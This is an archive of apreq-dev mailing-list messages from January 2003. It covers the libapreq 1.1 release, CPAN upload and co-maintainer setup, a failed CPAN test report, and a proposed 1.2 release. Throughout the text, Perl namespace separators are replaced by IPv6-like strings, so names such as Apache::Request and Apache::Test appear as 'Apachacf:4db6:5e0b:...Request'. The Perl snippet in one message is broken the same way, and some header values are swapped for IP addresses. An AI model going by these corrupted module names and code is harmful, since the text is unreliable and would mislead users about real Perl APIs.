http://www.apache.org/dist/httpd/libapreq/libapreq-1.1.tar.gz It should be CPAN friendly as well. -- Joe Schaefer From [email protected] Tue Jan 28 18:01:57 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80233 invoked by uid 500); 28 Jan 2003 18:01:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 80153 invoked from network); 28 Jan 2003 18:01:57 -0000 User-Agent: Microsoft-Entourage/161.129.204.1048 Date: Tue, 28 Jan 2003 10:01:58 -0800 Subject: Re: 1.1 release From: David Wheeler <[email protected]> To: Jim Winstead <[email protected]>, <[email protected]> Message-ID: <[email protected]> In-Reply-To: <[email protected]> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On 1/28/03 9:40 AM, "Jim Winstead" <[email protected]> wrote: > and if any cpan experts want to let us in on how to let the > responsibility for uploading to cpan can be shared, that would probably > be good. Log in to https://pause.perl.org/ and select "Change Permissions" from the left nav. Click the "Select" button next to " 2.3 Make somebody else co-maintainer". Select the namespaces you want to share the maintainership with (I assume Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bapreq, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest, and Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie) and then fill in the CPAN User ID of the person you want to make a co-maintainer. Click the "Make Co-Maintainer" and you're done. HTH, David From [email protected] Tue Jan 28 19:30:39 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72865 invoked by uid 500); 28 Jan 2003 19:30:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 72844 invoked from network); 28 Jan 2003 19:30:38 -0000 Date: Tue, 28 Jan 2003 11:28:13 -0800 From: Jim Winstead <[email protected]> To: Joe Schaefer <[email protected]> Cc: [email protected] Subject: Re: 1.1 release Message-ID: <[email protected]> Mail-Followup-To: Joe Schaefer <[email protected]>, [email protected] References: <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.3.28i X-Spam-Rating: 161.129.204.104 1.6.2 0/1000/N On Tue, Jan 28, 2003 at 01:04:46PM -0500, Joe Schaefer wrote: > Jim Winstead <[email protected]> writes: > > > if someone else would package up the build and put it out via the > > normal apache channels, i'll upload it to cpan. (in addition to > > getting it done sooner, this reduces the chances that i'll build the > > package with the wrong version of the autotools or make some other > > silly mistake.) > > The tarball is already on daedalus: > > http://www.apache.org/dist/httpd/libapreq/libapreq-1.1.tar.gz > > It should be CPAN friendly as well. ah, okay. it wasn't mentioned on the apreq web page, so i hadn't dug down to see that it was already there. i've uploaded it to cpan. jim From [email protected] Tue Jan 28 19:32:38 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76267 invoked by uid 500); 28 Jan 2003 19:32:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 76234 invoked from network); 28 Jan 2003 19:32:36 -0000 Date: Tue, 28 Jan 2003 11:32:29 -0800 From: Jim Winstead <[email protected]> To: David Wheeler <[email protected]> Cc: [email protected] Subject: Re: 1.1 release Message-ID: <[email protected]> Mail-Followup-To: David Wheeler <[email protected]>, [email protected] References: <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.3.28i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On Tue, Jan 28, 2003 at 10:01:58AM -0800, David Wheeler wrote: > On 1/28/03 9:40 AM, "Jim Winstead" <[email protected]> wrote: > > > and if any cpan experts want to let us in on how to let the > > responsibility for uploading to cpan can be shared, that would probably > > be good. > > Log in to https://pause.perl.org/ and select "Change Permissions" from the > left nav. Click the "Select" button next to " 2.3 Make somebody else > co-maintainer". Select the namespaces you want to share the maintainership > with (I assume Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bapreq, Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest, and Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie) and then > fill in the CPAN User ID of the person you want to make a co-maintainer. > Click the "Make Co-Maintainer" and you're done. thanks. i've added stas, joe, and randy kobes as co-maintainers of the Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest namespace. i don't have access to add co-maintainers for the Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie namespace (it is owned by the 'APML' cpan user). let me know if there's more people i should add. jim From [email protected] Tue Jan 28 19:34:02 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78761 invoked by uid 500); 28 Jan 2003 19:34:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 78722 invoked from network); 28 Jan 2003 19:34:01 -0000 Date: Tue, 28 Jan 2003 11:27:12 -0800 From: Jim Winstead <[email protected]> To: [email protected] Subject: [[email protected]: CPAN Upload: J/JI/JIMW/libapreq-1.1.tar.gz] Message-ID: <[email protected]> Mail-Followup-To: [email protected] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N ----- Forwarded message from PAUSE <[email protected]> ----- Date: Tue, 28 Jan 2003 20:20:35 +0100 Subject: CPAN Upload: J/JI/JIMW/libapreq-1.1.tar.gz From: PAUSE <[email protected]> To: "Jim Winstead" <[email protected]>, [email protected] The URL http://www.apache.org/dist/httpd/libapreq/libapreq-1.1.tar.gz has entered CPAN as file: $CPAN/authors/id/J/JI/JIMW/libapreq-1.1.tar.gz size: 306784 bytes md5: 99471b32f72c43dfd5d2e3078d44c1fc No action is required on your part Request entered by: JIMW (Jim Winstead) Request entered on: Tue, 28 Jan 2003 19:20:19 GMT Request completed: Tue, 28 Jan 2003 19:20:35 GMT Virtually Yours, paused, v89 ----- End forwarded message ----- From [email protected] Tue Jan 28 23:07:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28897 invoked by uid 500); 28 Jan 2003 23:07:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 28856 invoked from network); 28 Jan 2003 23:07:10 -0000 Date: Tue, 28 Jan 2003 15:07:16 -0800 From: Jim Winstead <[email protected]> To: Stas Bekman <[email protected]> Cc: [email protected] Subject: Re: [[email protected]: CPAN Upload: J/JI/JIMW/libapreq-1.1.tar.gz] Message-ID: <[email protected]> Mail-Followup-To: Stas Bekman <[email protected]>, [email protected] References: <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.3.28i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On Wed, Jan 29, 2003 at 10:03:52AM +1100, Stas Bekman wrote: > cool, can you please send it to the modperl list as well, including the > changes list? Thanks! i would prefer that someone more involved with the release (joe?) do announcements to any relevant lists. jim From [email protected] Tue Jan 28 23:36:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36412 invoked by uid 500); 28 Jan 2003 23:36:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 36394 invoked from network); 28 Jan 2003 23:36:14 -0000 Message-ID: <[email protected]> Date: Wed, 29 Jan 2003 10:16:34 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jim Winstead <[email protected]> Cc: [email protected] Subject: Re: [[email protected]: CPAN Upload: J/JI/JIMW/libapreq-1.1.tar.gz] References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Jim Winstead wrote: > On Wed, Jan 29, 2003 at 10:03:52AM +1100, Stas Bekman wrote: > >>cool, can you please send it to the modperl list as well, including the >>changes list? Thanks! > > > i would prefer that someone more involved with the release (joe?) do > announcements to any relevant lists. Of course ;) __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 30 00:30:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59035 invoked by uid 500); 30 Jan 2003 00:30:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59001 invoked from network); 30 Jan 2003 00:30:12 -0000 To: apreq list <[email protected]> Subject: Update website From: Joe Schaefer <[email protected]> Date: 29 Jan 2003 19:37:06 -0500 Message-ID: <[email protected]> Lines: 18 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I'm having trouble updating our section of the httpd website. Yesterday I committed changes to the News section of http://httpd.apache.org/apreq/index.html but they haven't yet shown up on the server. btw- I don't have Java installed on my Linux machine, so the build.sh script for httpd-site failed for me. Any tips? -- Joe Schaefer From [email protected] Thu Jan 30 00:43:31 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77627 invoked by uid 500); 30 Jan 2003 00:43:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 77615 invoked from network); 30 Jan 2003 00:43:30 -0000 Message-ID: <[email protected]> Date: Thu, 30 Jan 2003 11:42:37 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: Update website References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > I'm having trouble updating our section of > the httpd website. Yesterday I committed > changes to the News section of > > http://httpd.apache.org/apreq/index.html > > but they haven't yet shown up on the server. > > btw- I don't have Java installed on my Linux > machine, so the build.sh script for httpd-site > failed for me. > > Any tips? You should probably ask at the infrastructure (@apache.org) list. /me don't know how their build works. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 30 16:16:33 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69689 invoked by uid 500); 30 Jan 2003 16:16:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69678 invoked from network); 30 Jan 2003 16:16:32 -0000 Date: Thu, 30 Jan 2003 08:16:26 -0800 From: Jim Winstead <[email protected]> To: [email protected] Subject: [[email protected]: FAIL libapreq-1.1 OpenBSD.i386-openbsd 3.0] Message-ID: <[email protected]> Mail-Followup-To: [email protected] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N ----- Forwarded message from CPAN Tester | CPAN++ automate <[email protected]> ----- From: [email protected] (CPAN Tester | CPAN++ automate) To: [email protected] Cc: [email protected] Subject: FAIL libapreq-1.1 OpenBSD.i386-openbsd 3.0 This distribution has been tested as part of the cpan-testers effort to test as many new uploads to CPAN as possible. See http://testers.cpan.org/ Please cc any replies to [email protected] to keep other test volunteers informed and to prevent any duplicate effort. -- This is an error report generated automatically by CPANPLUS, version 0.042. Below is the error stack during 'make test': PERL_DL_NONLAZY=1 /usr/local/perl-5.8.0/bin/perl "-MExtUtilsacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bommanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bMM" "-e" "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t t/cookie.....skipped all skipped: no reason given t/inherit....FAILED test 1 Failed 1/1 tests, 0.00% okay t/request....FAILED tests 1-10 Failed 10/10 tests, 0.00% okay Failed Test Stat Wstat Total Fail Failed List of Failed ------------------------------------------------------------------------------- t/inherit.t 1 1 100.00% 1 t/request.t 10 10 100.00% 1-10 1 test skipped. Failed 2/3 test scripts, 33.33% okay. 11/11 subtests failed, 0.00% okay. *** Error code 25 Stop in /usr/local/home/alian/.cpanplus/5.8.0/build/libapreq-1.1 (line 729 of Makefile). Additional comments: -- Summary of my perl5 (revision 5.0 version 8 subversion 0) configuration: Platform: osname=openbsd, osvers=3.0, archname=OpenBSD.i386-openbsd uname='openbsd openbsd 3.0 generic#94 i386 ' config_args='-Dprefix=/usr/local/perl-5.8.0 -d' hint=recommended, useposix=true, d_sigaction=define usethreads=undef use5005threads=undef useithreads=undef usemultiplicity=undef useperlio=define d_sfio=undef uselargefiles=define usesocks=undef use64bitint=undef use64bitall=undef uselongdouble=undef usemymalloc=n, bincompat5005=undef Compiler: cc='cc', ccflags ='-fno-strict-aliasing -I/usr/local/include', optimize='-O2', cppflags='-fno-strict-aliasing -I/usr/local/include' ccversion='', gccversion='2.95.3 20010125 (prerelease)', gccosandvers='openbsd3.0' intsize=4, longsize=4, ptrsize=4, doublesize=8, byteorder=1234 d_longlong=define, longlongsize=8, d_longdbl=define, longdblsize=12 ivtype='long', ivsize=4, nvtype='double', nvsize=8, Off_t='off_t', lseeksize=8 alignbytes=4, prototype=define Linker and Libraries: ld='cc', ldflags =' -L/usr/local/lib' libpth=/usr/local/lib /usr/lib libs=-lm -lc -lutil perllibs=-lm -lc -lutil libc=/usr/lib/libc.so.28.0, so=so, useshrplib=false, libperl=libperl.a gnulibc_version='' Dynamic Linking: dlsrc=dl_dlopen.xs, dlext=so, d_dlsymun=define, ccdlflags=' ' cccdlflags='-DPIC -fPIC ', lddlflags='-shared -fPIC -L/usr/local/lib' ----- End forwarded message ----- From [email protected] Thu Jan 30 16:30:57 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16994 invoked by uid 500); 30 Jan 2003 16:30:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16960 invoked from network); 30 Jan 2003 16:30:56 -0000 Date: Thu, 30 Jan 2003 10:24:55 -0600 (CST) From: Randy Kobes <[email protected]> To: Jim Winstead <[email protected]> cc: [email protected] Subject: Re: [[email protected]: FAIL libapreq-1.1 OpenBSD.i386-openbsd 3.0] In-Reply-To: <[email protected]> Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On Thu, 30 Jan 2003, Jim Winstead wrote: > ----- Forwarded message from CPAN Tester | CPAN++ automate <[email protected]> ----- > > From: [email protected] (CPAN Tester | CPAN++ automate) > To: [email protected] > Cc: [email protected] > Subject: FAIL libapreq-1.1 OpenBSD.i386-openbsd 3.0 > > This distribution has been tested as part of the cpan-testers > effort to test as many new uploads to CPAN as possible. See > http://testers.cpan.org/ > > Please cc any replies to [email protected] to keep other > test volunteers informed and to prevent any duplicate effort. > > -- > This is an error report generated automatically by CPANPLUS, > version 0.042. > > Below is the error stack during 'make test': > > t/cookie.....skipped > all skipped: no reason given > t/inherit....FAILED test 1 > Failed 1/1 tests, 0.00% okay > t/request....FAILED tests 1-10 > Failed 10/10 tests, 0.00% okay > Failed Test Stat Wstat Total Fail Failed List of Failed > ------------------------------------------------------------------------------- > t/inherit.t 1 1 100.00% 1 > t/request.t 10 10 100.00% 1-10 > 1 test skipped. > Failed 2/3 test scripts, 33.33% okay. 11/11 subtests failed, 0.00% okay. > *** Error code 25 It's unlikely the machine that is being used to generate these automated reports has access to a working apache, or else CPANPLUS didn't supply appropriate responses in the Makefile.PL dialogue. In any case, without any further information it's hard to tell from these automated test reports what's going on. -- best regards, randy kobes From [email protected] Fri Jan 31 08:50:58 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37027 invoked by uid 500); 31 Jan 2003 08:50:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 36963 invoked from network); 31 Jan 2003 08:50:57 -0000 X-Authentication-Warning: localhost.localdomain: core set sender to [email protected] using -f Date: Fri, 31 Jan 2003 02:53:00 -0600 From: Shawn <[email protected]> To: [email protected] Subject: Help with httpd-apreq-2 cvs? Message-ID: <[email protected]> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="1yeeQ81UyVL57Vl7" Content-Disposition: inline User-Agent: Mutt/1.4i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --1yeeQ81UyVL57Vl7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline I'd be happy with some rough instructions for getting the CVS httpd-apreq-2 cvs working with my Apache/2.1.0-dev (Unix) mod_perl/1.99_09-dev Perl/v5.8.0. Would I somehow use the perl stuff from .51 or .60RC? I just want to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bGallery working. It's been an obsession. So far, this is the only stuff it needs, as I can see. use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest(); my $r = shift or Apache->request(); my $apr = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest->instance($r, DISABLE_UPLOADS => 1, POST_MAX => 1024); Apache->request->log_error("Something was fishy with the type of the file $file\n"); -- [email protected] A cop stopped me for speeding. He said, 'Why were you going so fast?' I said, 'See this thing my foot is on? It's called an accelerator. When you push down on it, it sends more gas to the engine. The whole car just takes right off. And see this thing? This steers it' -- Stephen Wright --1yeeQ81UyVL57Vl7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE+OjlpubgCGkrWpN4RAt1NAKC4Lps9dOYcZsKP41NV6LKK8Tmu2ACg26Kj fBMDw65biR8ccUZaL+btnIU= =hKAa -----END PGP SIGNATURE----- --1yeeQ81UyVL57Vl7-- From [email protected] Fri Jan 31 11:48:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35253 invoked by uid 500); 31 Jan 2003 11:48:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 35242 invoked from network); 31 Jan 2003 11:48:13 -0000 To: Shawn <[email protected]> Cc: [email protected] Subject: Re: Help with httpd-apreq-2 cvs? References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 31 Jan 2003 06:55:02 -0500 In-Reply-To: Shawn's message of "Fri, 31 Jan 2003 02:53:00 -0600" Message-ID: <[email protected]> Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Shawn <[email protected]> writes: > I'd be happy with some rough instructions for getting the CVS > httpd-apreq-2 cvs working with my Apache/2.1.0-dev (Unix) > mod_perl/1.99_09-dev Perl/v5.8.0. Would I somehow use the perl > stuff from .51 or .60RC? A working httpd-apreq-2 repository is a high priority for me, but not the top on right now. I want to fix whatever got broken in the 1.1 release, including the release process itself. -- Joe Schaefer From [email protected] Fri Jan 31 14:50:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37897 invoked by uid 500); 31 Jan 2003 14:50:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 37886 invoked from network); 31 Jan 2003 14:50:46 -0000 To: apreq list <[email protected]> Subject: [proposal] 1.2 release From: Joe Schaefer <[email protected]> Date: 31 Jan 2003 09:57:37 -0500 In-Reply-To: IKEBE Tomohiro's message of "Tue, 28 Jan 2003 21:32:43 +0900" Message-ID: <[email protected]> Lines: 28 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I volunteer to put together a 1.2 release. My goals are 1) work with the mod_perl community to eliminate any segfaults we introduced into the Request.xs upload code. 2) make the test suite less intrusive. If Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest can resolve our current problems with our current tests, I'll change our test suite back over to Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest. 3) Include IKEBE Tomohiro's patch to support %uXXXX encoding. 4) Execute the CPAN release. 5) Update the httpd-site accordingly, and ensure that the cvs changes actually get published this time through. 6) If I get it right this time, I'll document the process. Thanks for your patience, folks. -- Joe Schaefer From [email protected] Fri Jan 31 22:27:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64630 invoked by uid 500); 31 Jan 2003 22:27:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 64618 invoked from network); 31 Jan 2003 22:27:45 -0000 Message-ID: <[email protected]> Date: Sat, 01 Feb 2003 09:26:50 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Shawn <[email protected]> Cc: [email protected] Subject: Re: Help with httpd-apreq-2 cvs? References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Shawn wrote: > I'd be happy with some rough instructions for getting the CVS > httpd-apreq-2 cvs working with my Apache/2.1.0-dev (Unix) > mod_perl/1.99_09-dev Perl/v5.8.0. Would I somehow use the perl stuff > from .51 or .60RC? > > I just want to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bGallery working. It's been an obsession. So > far, this is the only stuff it needs, as I can see. > > use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest(); > my $r = shift or Apache->request(); > my $apr = Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest->instance($r, DISABLE_UPLOADS => 1, POST_MAX => 1024); > Apache->request->log_error("Something was fishy with the type of the file $file\n"); While things aren't available, you can use CGI.pm instead. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 31 22:28:40 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66065 invoked by uid 500); 31 Jan 2003 22:28:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 66029 invoked from network); 31 Jan 2003 22:28:39 -0000 Message-ID: <[email protected]> Date: Sat, 01 Feb 2003 09:27:44 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest under 'root' Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N FYI: I've fixed Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest to run flawlessly under the 'root' user. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 31 22:31:05 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68487 invoked by uid 500); 31 Jan 2003 22:31:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68472 invoked from network); 31 Jan 2003 22:31:04 -0000 Message-ID: <[email protected]> Date: Sat, 01 Feb 2003 09:30:09 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: [proposal] 1.2 release References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > I volunteer to put together a 1.2 release. My goals > are > > 1) work with the mod_perl community to eliminate > any segfaults we introduced into the Request.xs > upload code. > > 2) make the test suite less intrusive. If Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest > can resolve our current problems with our current > tests, I'll change our test suite back over to > Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest. > > 3) Include IKEBE Tomohiro's patch to support %uXXXX > encoding. > > 4) Execute the CPAN release. > > 5) Update the httpd-site accordingly, and ensure > that the cvs changes actually get published > this time through. > > 6) If I get it right this time, I'll document the > process. > > Thanks for your patience, folks. Thanks Joe! If you need help with Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest, let me know. Make sure to use the latest mod_perl cvs for that. Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTest will be released as a separate package at some point, but for now copying it should work the same. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 31 22:37:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81226 invoked by uid 500); 31 Jan 2003 22:37:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 81205 invoked from network); 31 Jan 2003 22:37:47 -0000 X-Authentication-Warning: localhost.localdomain: core set sender to [email protected] using -f Date: Fri, 31 Jan 2003 16:39:51 -0600 From: Shawn <[email protected]> To: Stas Bekman <[email protected]> Cc: [email protected] Subject: Re: Help with httpd-apreq-2 cvs? Message-ID: <[email protected]> References: <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.4i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I take it something like this would be a porting effort, and 